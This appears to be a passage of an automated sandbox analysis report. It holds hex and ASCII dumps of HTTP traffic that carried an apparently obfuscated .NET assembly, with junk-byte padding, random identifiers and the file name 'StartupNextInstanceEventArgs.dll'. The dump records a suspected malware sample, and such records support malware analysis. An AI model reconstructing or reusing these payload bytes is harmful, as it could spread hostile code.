                                2022-08-05 09:41:36 UTC40INData Raw: 10 00 00 0a 1f 10 20 ff ff ff 7f 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 2b 00 00 06 0c 00 08 16 28 17 00 00 0a 0a 16 06 13 07 0d 38 84 05 00 00 08 1e 20 ff ff ff 7f 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65
                                Data Ascii: eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w(xeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w(+(8 eeeeeeeeeeeeeeeeeeeeeeeeeeee(w(xeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
                                2022-08-05 09:41:36 UTC42INData Raw: 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 2b 00 00 06 16 28 17 00 00 0a 6a 02 d6 0b 2b 53 00 00 09 17 20 ff ff ff 7f 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a d6 0d 09 11 07 13 09 11 09 3e 70 fa ff ff 16 6a 0b 2b 00 07 2a 00 00 00 1b 30 0b 00 cc 20 00 00 06 00 00 11 00 7e 28 00 00 04 8d 15 00 00 01 13 2f 11 2f 16 72
                                Data Ascii: eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w(xeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w(+(j+S eeeeeeeeeeeeeeeeeeeeeeeeeeee(w(xeeeeeeeeeeee(w>pj+*0 ~(//r
                                2022-08-05 09:41:36 UTC43INData Raw: 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 8d 15 00 00 01 13 2f 11 2f 16 72 f9 10 00 70 20 26 cc cf a5 20 19 50 20 be 20 56 7e 2e 71 20 a6 6a 2f 98 20 ee a1 a1 63 28 5d 00 00 06 a2 00 11 2f 17 20 ff ff ff 7f 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 72 94 11 00 70 20 3e dc
                                Data Ascii: eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w(xeeeeeeeeeeeeee(w//rp & P V~.q j/ c(]/ eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w(xeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(wrp >
                                2022-08-05 09:41:36 UTC44INData Raw: 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 72 d6 14 00 70 20 5a ab 5a ae 20 3d 5b a2 5f 20 50 54 a1 e7 20 e4 0f 1f d3 20 bf 79 33 91 28 5d 00 00 06 a2 00 11 2f 28 2e 00 00 06 13 0f 18 20 ff ff ff 7f 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 8d 15 00 00 01 13 2f 11 2f 16 72 f6 14 00 70 20 20 fb ef 68 20 5d 37 60 36 20 34 49 9f c4 20 e0 e6 bf 32 20 63 a8 f9 71 28 5d 00 00 06 a2 00 11 2f 17 20 ff ff ff 7f 65 65 65
                                Data Ascii: eeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(wrp ZZ =[_ PT y3(]/(. eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w(xeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w//rp h ]7`6 4I 2 cq(]/ eee
                                2022-08-05 09:41:36 UTC46INData Raw: 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 17 00 00 0a 13 1e 04 11 1e 1f 34 20 ff ff ff 7f 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a d6 28 17 00 00 0a 13 20 20 b3 00 00 00 20 ff ff ff 7f 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65
                                Data Ascii: eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w(xeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w(4 eeeeeeeeeeeeeeeeeeeeee(w(xeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w( eeeeeeeeeeeeeeeeeeeeeeee(w(xee
                                2022-08-05 09:41:36 UTC47INData Raw: 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 1f 40 20 ff ff ff 7f 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 6f 57 00 00 06 13 24 05 2c 05 11 24 16 2e 03 16 2b 7b 17 20 ff ff ff 7f 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65
                                Data Ascii: eee(w(xeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w@ eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w(xeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(woW$,$.+{ eeeeeeeeee(w(xeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
                                2022-08-05 09:41:36 UTC48INData Raw: 65 65 65 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a da 17 20 ff ff ff 7f 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a d6 17 20 ff ff ff 7f 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a
                                Data Ascii: eeeeee(w(xeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w(xeeeeeeeeeeee(w eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w
                                2022-08-05 09:41:36 UTC50INData Raw: 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 11 24 11 1f d6 9e 28 15 00 00 0a 1a 20 ff ff ff 7f 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a fe 01 13 32 11 32 2c 22 11 12 12 01 7b 10 00 00 04 11 1a 6f 43 00 00 06 16 fe 01 13 31 11 31 2c 06 73 21 00 00 0a 7a 00 2b 1f 11 15 12 01 7b 10 00 00 04 11 1a 6f 47 00 00 06 16 fe 01 13 32 11 32 2c 06 73 21 00 00 0a 7a 00 11 06
                                Data Ascii: eeeeeeeeeeeeeeeeeeeeeeeeee(w$( eeeeeeeeeeeeeeeeee(w(xeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w22,"{oC11,s!z+{oG22,s!z
                                2022-08-05 09:41:36 UTC51INData Raw: 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00
                                Data Ascii: eeeeeeeeeeeeeeeeeeeeeeeee
                                2022-08-05 09:41:36 UTC52INData Raw: 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 28 00 09 00 00 00 77 00 00 0a 00 00 00
                                Data Ascii: eeeeeeeeeeeeeeeeeeeeeeee(w
                                2022-08-05 09:41:36 UTC54INData Raw: 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 28 00 09 00 00 00 77 00 00 0a 00 00 00 00 28 00 09 00 00 00 78 00 00 0a 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00
                                Data Ascii: eeeeeee(w(xeeeeeeeeeeeeeee
                                2022-08-05 09:41:36 UTC55INData Raw: 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 28 00 09 00 00 00 77 00 00 0a 00 00 00 00 28 00 09 00 00 00 78 00 00 0a 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 00 00 65 00 00 00 00
                                Data Ascii: eeeeeeeeeeeeeee(w(xeeeeeeee
                                2022-08-05 09:41:36 UTC57INData Raw: 02 26 02 06 00 84 02 66 02 0a 00 94 02 8d 02 06 00 ec 02 26 02 0a 00 6a 03 8d 02 06 00 ec 03 c2 03 0a 00 2c 04 11 04 0e 00 4a 04 3a 04 0e 00 74 04 3a 04 0e 00 a5 04 3a 04 0e 00 c0 04 3a 04 0a 00 e7 04 11 04 0a 00 44 05 31 05 0a 00 c6 05 b5 05 0a 00 f7 05 e2 05 12 00 5c 06 47 06 0a 00 e9 07 8d 02 0a 00 15 08 8d 02 0a 00 22 08 8d 02 0a 00 87 09 8d 02 0a 00 02 0a 8d 02 12 00 1c 0a 09 0a 0a 00 2a 0a 31 05 12 00 46 0a 09 0a 12 00 60 0a 09 0a 0a 00 84 0a 31 05 0a 00 d5 0a b5 0a 06 00 31 0b 0a 0b 0a 00 62 0b 8d 02 0a 00 76 0b 8d 02 0a 00 89 0b 8d 02 0a 00 cc 0b ad 0b 0a 00 d4 0b 8d 02 06 00 fb 0b 0a 0b 0a 00 1a 0c 8d 02 0a 00 37 0c 8d 02 0a 00 58 0c 4c 0c 0a 00 75 0c 8d 02 0a 00 88 0c 8d 02 0a 00 b3 0c 8d 02 0a 00 b9 0c 8d 02 0a 00 c0 0c 8d 02 06 00 d9 0c 0a 0b
                                Data Ascii: &f&j,J:t:::D1\G"*1F`11bv7XLu
                                2022-08-05 09:41:36 UTC58INData Raw: bc 02 06 00 b6 09 bc 02 06 00 22 07 bc 02 06 00 bf 09 cc 01 06 00 c9 09 cc 01 06 00 d1 09 cc 01 06 10 d7 09 bf 02 06 00 dc 09 b9 02 06 00 e6 09 b9 02 06 00 ef 09 b9 02 06 00 f9 09 b9 02 16 00 d1 14 b0 08 16 00 04 14 b0 08 16 00 bf 14 b0 08 16 00 bc 13 b0 08 16 00 9b 14 b0 08 16 00 d8 12 b0 08 16 00 aa 13 b0 08 16 00 4b 14 b0 08 16 00 39 13 b0 08 16 00 b6 14 b0 08 16 00 42 14 b0 08 16 00 42 13 b0 08 16 00 b4 12 b0 08 16 00 e9 13 b0 08 16 00 34 29 e4 08 16 00 21 29 e9 08 16 00 02 29 f4 08 5c 00 5d 00 5e 00 5f 00 60 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0a 00 0b 00 0c 00 0d 00 0e 00 0f 00 10 00 11 00 12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00 1a 00 1b 00 1c 00 1d 00 1e 00 1f 00 20 00 21 00 22 00 23 00 24 00 25 00 26 00 27 00 28 00 29
                                Data Ascii: "K9BB4)!))\]^_` !"#$%&'()
                                2022-08-05 09:41:36 UTC59INData Raw: 00 46 03 30 08 39 02 7e 00 00 00 00 00 03 00 46 03 60 08 48 02 85 00 00 00 00 00 03 00 46 03 7e 08 52 02 88 00 00 00 00 00 03 00 06 18 60 02 d3 01 8d 00 00 00 00 00 03 00 46 03 30 08 5d 02 8f 00 00 00 00 00 03 00 46 03 60 08 6c 02 96 00 00 00 00 00 03 00 46 03 7e 08 74 02 98 00 00 00 00 00 03 00 06 18 60 02 d3 01 9d 00 00 00 00 00 03 00 46 03 30 08 7f 02 9f 00 00 00 00 00 03 00 46 03 60 08 89 02 a3 00 00 00 00 00 03 00 46 03 7e 08 8f 02 a4 00 00 00 00 00 03 00 06 18 60 02 d3 01 a6 00 00 00 00 00 03 00 46 03 30 08 95 02 a8 00 00 00 00 00 03 00 46 03 60 08 89 02 af 00 00 00 00 00 03 00 46 03 7e 08 a2 02 b0 00 00 00 00 00 03 00 06 18 60 02 d3 01 b5 00 00 00 00 00 03 00 46 03 30 08 ab 02 b7 00 00 00 00 00 03 00 46 03 60 08 89 02 ba 00 00 00 00 00 03 00 46 03
                                Data Ascii: F09~F`HF~R`F0]F`lF~t`F0F`F~`F0F`F~`F0F`F
                                2022-08-05 09:41:36 UTC61INData Raw: 00 00 07 00 4d 08 00 00 01 00 6a 08 00 00 01 00 64 09 00 00 02 00 6b 09 00 00 03 00 73 09 00 00 04 00 7a 09 00 00 05 00 7f 09 00 00 01 00 fb 07 00 00 02 00 08 08 00 00 01 00 64 09 00 00 02 00 3c 08 00 00 03 00 4d 08 00 00 01 00 6a 08 00 00 01 00 64 09 19 00 60 02 13 00 a9 00 36 0a cd 02 a9 00 3f 0a d2 02 c1 00 4e 0a d8 02 c1 00 78 0a dd 02 d1 00 9b 0a e2 02 b9 00 a9 0a e7 02 d9 00 e4 0a eb 02 b1 00 f3 0a 71 00 a9 00 02 0b 71 00 e1 00 3b 0b f0 02 b1 00 49 0b f7 02 b9 00 59 0b fb 02 e9 00 6e 0b 13 00 f1 00 7d 0b 0b 03 f1 00 7d 0b 10 03 29 00 9b 0b 15 03 01 01 dd 0b 1c 03 11 01 07 0c 25 03 01 01 1f 0c 36 03 f1 00 24 0c 46 03 01 01 2d 0c 4a 03 21 01 44 0c 4f 03 29 01 61 0c 56 03 29 01 6b 0c 5c 03 a9 00 7a 0c 62 03 21 01 80 0c 69 03 a9 00 92 0c b0 03 01 01 99
                                Data Ascii: Mjdkszd<Mjd`6?Nxqq;IYn}})%6$F-J!DO)aV)k\zb!i
                                2022-08-05 09:41:36 UTC62INData Raw: 00 93 01 83 04 63 00 8b 01 74 04 69 00 fb 01 0a 05 80 00 a3 01 57 04 83 00 93 01 83 04 83 00 eb 01 57 04 83 00 f3 01 57 04 89 00 fb 01 e5 04 a0 00 a3 01 57 04 a3 00 8b 01 74 04 a3 00 23 02 38 05 c0 00 a3 01 57 04 c3 00 8b 01 74 04 c3 00 4b 02 c2 05 c9 00 2b 03 57 04 e0 00 a3 01 57 04 e3 00 23 03 57 04 e3 00 6b 01 57 04 e3 00 8b 01 74 04 e9 00 2b 03 57 04 00 01 8b 01 74 04 00 01 a3 01 57 04 03 01 8b 01 74 04 03 01 23 03 57 04 03 01 6b 01 57 04 09 01 2b 03 57 04 20 01 a3 01 57 04 20 01 8b 01 74 04 23 01 eb 01 57 04 23 01 6b 01 57 04 23 01 93 01 f3 06 23 01 f3 01 57 04 23 01 23 03 57 04 29 01 8b 01 34 07 40 01 a3 01 57 04 40 01 8b 01 74 04 43 01 93 01 4b 07 43 01 8b 01 34 07 43 01 23 03 57 04 49 01 8b 01 34 07 60 01 8b 01 74 04 60 01 a3 01 57 04 63 01 eb 01
                                Data Ascii: ctiWWWWt#8WtK+WW#WkWt+WtWt#WkW+W W t#W#kW##W##W)4@W@tCKC4C#WI4`t`Wc
                                2022-08-05 09:41:36 UTC63INData Raw: 73 74 61 6e 63 65 45 76 65 6e 74 41 72 67 73 00 65 74 5a 45 71 73 49 74 4e 4e 55 4e 4f 4a 4e 00 65 72 49 6c 4f 48 6d 54 6a 76 46 55 52 55 42 00 66 4c 6b 4f 54 6f 51 64 54 72 5a 49 4c 56 71 00 66 4c 4e 63 76 42 43 4f 57 45 6a 6c 58 5a 51 00 6e 6d 58 49 52 65 7a 54 5a 48 69 4e 6f 50 70 00 55 61 79 74 50 50 48 4a 59 55 63 53 4f 4b 6a 00 44 74 5a 44 5a 6d 6b 58 45 67 66 4e 4a 71 68 00 6e 4e 55 68 46 49 49 79 4a 56 66 78 55 6f 4a 00 68 6c 49 4b 45 70 4a 6c 70 43 6a 59 75 4e 46 00 58 54 54 4c 43 6b 78 67 45 61 50 51 51 43 74 00 73 44 47 57 6a 74 49 6e 6e 65 41 74 76 51 44 00 65 4e 50 44 67 71 71 4e 53 47 4e 59 4e 67 4c 00 43 6d 4c 4f 6c 50 43 56 4f 53 6b 41 56 6b 59 00 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c 42 61 73 69 63 2e 41 70 70 6c 69 63 61 74 69
                                Data Ascii: stanceEventArgsetZEqsItNNUNOJNerIlOHmTjvFURUBfLkOToQdTrZILVqfLNcvBCOWEjlXZQnmXIRezTZHiNoPpUaytPPHJYUcSOKjDtZDZmkXEgfNJqhnNUhFIIyJVfxUoJhlIKEpJlpCjYuNFXTTLCkxgEaPQQCtsDGWjtInneAtvQDeNPDgqqNSGNYNgLCmLOlPCVOSkAVkYMicrosoft.VisualBasic.Applicati
                                2022-08-05 09:41:36 UTC67INData Raw: 6d 62 6c 79 44 65 73 63 72 69 70 74 69 6f 6e 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 74 65 00 53 74 61 72 74 75 70 4e 65 78 74 49 6e 73 74 61 6e 63 65 45 76 65 6e 74 41 72 67 73 2e 64 6c 6c 00 36 41 35 33 37 30 30 30 00 38 39 34 32 33 46 31 30 00 46 36 39 34 44 37 39 30 00 43 36 34 37 41 35 30 31 00 45 42 43 31 33 34 41 31 00 43 34 45 45 30 41 43 31 00 45 43 42 44 41 37 34 32 00 46 34 31 46 44 38 38 32 00 32 45 37 38 37 39 38 32 00 32 33 44 41 35 43 38 32 00 31 37 36 46 33 30 43 32 00 38 31 41 43 38 44 45 32 00 45 35 33 46 31 35 30 33 00 44 39 41 41 32 32 32 33 00 37 42 36 36 44 35 36 34 00 33 38 30 34 30 34 41 34 00 45 30 42 32 41 41 34 00 32 31 35 35 34 41 46 34 00 39 38 39 31 30 38 30 35 00 37 45 45 36
                                Data Ascii: mblyDescriptionAttributeAssemblyTitleAttributeStartupNextInstanceEventArgs.dll6A53700089423F10F694D790C647A501EBC134A1C4EE0AC1ECBDA742F41FD8822E78798223DA5C82176F30C281AC8DE2E53F1503D9AA22237B66D564380404A4E0B2AA421554AF4989108057EE6
                                2022-08-05 09:41:36 UTC71INData Raw: b4 8f ca 99 d2 93 e1 b4 9c 73 e1 b4 84 e1 b4 80 e1 b4 9b e1 b4 87 e1 b4 85 20 ca 99 ca 8f 20 73 e1 b4 87 e1 b4 a0 e1 b4 87 c9 b4 20 e1 b4 87 ca 8f e1 b4 87 20 e1 b4 84 ca 80 ca 8f e1 b4 98 e1 b4 9b e1 b4 87 ca 80 e8 8d 89 d0 b5 e7 85 99 d7 a4 d7 a4 e3 83 a7 d0 b0 e3 82 b7 d7 a6 e0 a4 85 e0 a4 aa d7 98 d7 98 d7 98 d0 b8 e0 a4 9a d7 93 d1 8a e5 84 bf e5 84 bf e8 bf aa e3 82 87 e3 81 93 e8 af b6 d1 82 e0 a4 aa e5 a8 9c e5 b1 81 d7 96 e0 a4 9b e8 af b6 d0 b2 d0 b8 d7 a9 e0 a4 aa e3 82 87 d7 a1 e3 82 a6 e3 82 a6 e0 a4 aa d7 a8 e5 84 bf d7 93 e9 87 91 e0 a4 ae e3 82 bf e5 b0 ba e3 82 b3 e3 81 97 d0 b1 d0 b5 e3 83 a7 e3 82 b3 d0 b4 e5 b0 ba e3 81 8e e0 a4 aa d0 b5 e3 83 a7 e5 84 bf e3 82 8f e5 a4 8d d7 98 e0 a4 8f e0 a4 9a d7 98 e8 a5 bf d1 82 d0 b5 e5 84 bf d7
                                Data Ascii: s s
                                2022-08-05 09:41:36 UTC72INData Raw: 20 73 e1 b4 87 e1 b4 a0 e1 b4 87 c9 b4 20 e1 b4 87 ca 8f e1 b4 87 20 e1 b4 84 ca 80 ca 8f e1 b4 98 e1 b4 9b e1 b4 87 ca 80 d1 8a e3 81 93 d7 a6 e3 82 b7 e0 a4 aa d0 b2 e5 bc 80 d0 b5 d7 98 e5 bc 80 e5 a8 9c e9 a9 ac e8 af b6 e3 81 9f e3 82 ad e0 a4 aa e0 a4 8f e3 82 87 e6 9d b0 d7 a6 e6 9d b0 d1 8a e3 82 bf e3 82 8f e3 82 87 d7 a9 e3 82 b3 e3 82 bf e3 83 a7 e0 a4 9b e8 89 be e3 81 b0 d0 b5 d7 90 e5 90 be e8 b4 bc e3 82 a6 d7 96 d0 b1 e5 84 bf e3 81 9f e4 b8 bd e5 a4 8d e3 82 8f e0 a4 9b e3 82 bf e3 81 93 e0 a4 9b e3 82 87 e3 81 97 d0 b2 e3 82 bf e8 af b6 e3 82 bf e5 b1 81 e3 82 87 e0 a4 85 e3 81 93 e3 81 8e d0 b6 d1 8a d7 a6 e0 a4 82 e3 82 b7 e3 83 a7 e3 82 b7 e3 82 bf e5 b0 ba e5 b1 81 d0 b2 e8 8d 89 e5 b1 81 e5 bc 80 e3 82 bf e9 a9 ac d7 96 d1 82 e3 82
                                Data Ascii: s
                                2022-08-05 09:41:36 UTC77INData Raw: 00 72 00 68 00 54 00 69 00 53 00 42 00 57 00 57 00 54 00 6f 00 59 00 44 00 78 00 46 00 66 00 45 00 67 00 6b 00 65 00 6d 00 75 00 69 00 53 00 42 00 57 00 57 00 54 00 6f 00 59 00 44 00 78 00 46 00 66 00 45 00 67 00 6b 00 73 00 65 00 52 00 69 00 53 00 42 00 57 00 57 00 54 00 6f 00 59 00 44 00 78 00 46 00 66 00 45 00 67 00 6b 00 00 1f 69 00 53 00 42 00 57 00 57 00 54 00 6f 00 59 00 44 00 78 00 46 00 66 00 45 00 67 00 6b 00 00 0b 22 00 7b 00 30 00 7d 00 22 00 00 03 20 00 00 4d 53 00 74 00 61 00 72 00 74 00 75 00 70 00 4e 00 65 00 78 00 74 00 49 00 6e 00 73 00 74 00 61 00 6e 00 63 00 65 00 45 00 76 00 65 00 6e 00 74 00 41 00 72 